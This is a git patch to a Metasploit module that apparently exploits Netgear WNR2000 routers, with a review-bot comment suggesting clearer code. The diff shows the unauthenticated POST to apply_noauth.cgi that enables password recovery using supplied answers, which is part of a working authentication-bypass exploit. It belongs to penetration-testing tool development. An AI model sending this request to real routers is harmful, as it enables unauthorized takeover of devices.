From bee36ca90f60745959b01bfbfc490c29bb3e7d34 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Thu, 11 May 2017 16:22:21 -0500
Subject: [PATCH] Fix edge case
---
 .../admin/http/netgear_wnr2000_pass_recovery.rb | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb b/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb
index 49cd84fa20..1ea93dfcde 100644
--- a/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb
+++ b/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb
@@ -178,11 +178,12 @@ class MetasploitModule < Msf::Auxiliary
 
 def send_req(timestamp)
 begin
- uri_str = (timestamp == nil ? \
- "/apply_noauth.cgi?/PWD_password.htm" : \
- "/apply_noauth.cgi?/PWD_password.htm%20timestamp=#{timestamp.to_s}")
+ query_str = (timestamp == nil ? \
+ '/PWD_password.htm' : \
+ "/PWD_password.htm%20timestamp=#{timestamp.to_s}")
 res = send_request_raw({
- 'uri' => uri_str,
+ 'uri' => '/apply_noauth.cgi',
+ 'query' => query_str,
 'method' => 'POST',
 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
 'data' => "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=#{@q1}&question2=2&answer2=#{@q2}"
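Review bot: Neither the commit message ("Fix edge case") nor the new `query_str` / `'query' => query_str` lines record why the path and the query string are now passed separately, so a later cleanup could fold them back into a single `'uri'` string and reintroduce whatever broke. A short comment above `query_str` would pin this down, for example `# Query is passed via 'query', not appended to 'uri': it is not key=value form and the literal %20 must be sent as written` (the author should confirm the wording, since the edge case itself is not shown here). As a style point on the same lines, putting the ternary on one line removes the backslash continuations, `timestamp == nil` reads better as `timestamp.nil?`, and `.to_s` is redundant inside interpolation: `query_str = timestamp.nil? ? '/PWD_password.htm' : "/PWD_password.htm%20timestamp=#{timestamp}"`. The body of send_req, including whatever closes the `begin`, continues past the end of the hunk.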